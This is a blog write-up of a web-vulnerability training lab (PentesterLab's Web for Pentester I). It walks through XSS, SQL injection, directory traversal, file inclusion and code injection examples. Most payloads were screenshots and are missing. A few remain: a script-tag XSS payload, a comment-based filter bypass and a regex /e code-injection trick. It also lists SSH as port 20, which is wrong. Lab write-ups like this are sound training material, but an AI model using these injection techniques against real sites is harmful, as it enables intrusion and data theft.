Tue. Oct 20th, 2020

Pentesting Fun Stuff

following the cyber security path…

Web for pentester I

Introduction

This is an exercise from pentesterlab which contain some of the basic web vulnerabilities.

Location

https://www.pentesterlab.com/exercises/web_for_pentester

Getting started

To get a view on what is running, I start with a nmap scan.

3 ports seem to be open: 20 (SSH), 80 (HTTP) and 389 (LDAP).
On the website are the following sections listed:

  1. XSS
  2. SQL injections
  3. Directory traversal
  4. File inlusion
  5. Code injection
  6. Command injection
  7. LDAP attack
  8. File upload
  9. XML attack

I’m going to start from the top and work my way down.

1. XSS

When I follow this first link in the section “XSS” I find a parameter which holds the value ‘hacker’.
xss1
 
To test for a possible XSS vulnerability I replace the value with a piece of javascript code.
This value doesn’t get validated properly and is echoed directly back onto the page.
xss3
When viewing the source code I see that the request is echoed back without any encoding.

When I follow example 2 and inject the same javascript code, I get a different result.
xss2-1
When viewing the source code I see that ‘<script>’ and ‘</script>’ are filtered out. When I play with the format a little the script does gets echoed back correctly.

The third example has another filtering. This time the solution lies in using the following payload.

The fourth example filters on the whole ‘<script>’ and renders it useless. But when using a HTML tag, I can still get a pop-up.

For the rest of the examples I’m only going to write-up the correct payload.
Example 5:

Example 6:

Example 7:

Example 8:

Example 9:
At current time this example doesn’t run with modern browsers. I could download an old version and run it, but I’m not. This example is easily executed by replacing  #hacker with #<script>alert("n13mant")</script>.
 

2. SQL injections

Example 1:
sql1
Now let’s add a single quote.
sql2
Now let’s add a double quote.
sql3
So with the single quote I mess up the query. Let’s build further on that.
sql4
Example 2:
sql2-1
No space…..no problem!
sql2-2
Example 3:
Same solution works with this example, but the purpose of this example is to bypass the filter with the use of /**/.
sql3-1
Example 4:
sql4-1
Example 5:
sql5-1
Example 6:
sql6-1
Example 7:
Before URL encoding.
sql7-1
 
After URL encoding.
sql7-2
Example 8:

 

3. Directory traversal

Example 1:
pt1-1
Example 2:
pt2-1
Example 3:
pt3-1
 

4. File inclusion

Example 1:
fi1-1
So far I got a Local File Inclusion. Now to get a Remote File Inclusion. For this I’ve created a php file with phpinfo() in it.
fi1-2
Example 2:
fi2-2
fi2-1

5. Code injection

Example 1:
code_inj1-1
Example 2:
code_inj2-1
Example 3:
The regex got modified to search and replace   n13mant with   n13mant/e , which causes ‘hacker’ to be interpreted as php code.
code_inj3-1
Example 4:
code_inj4-1

6. Command injection

To be continued….

7. LDAP attack

To be continued….

8. File upload

To be continued….

9. XML attack

To be continued….
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.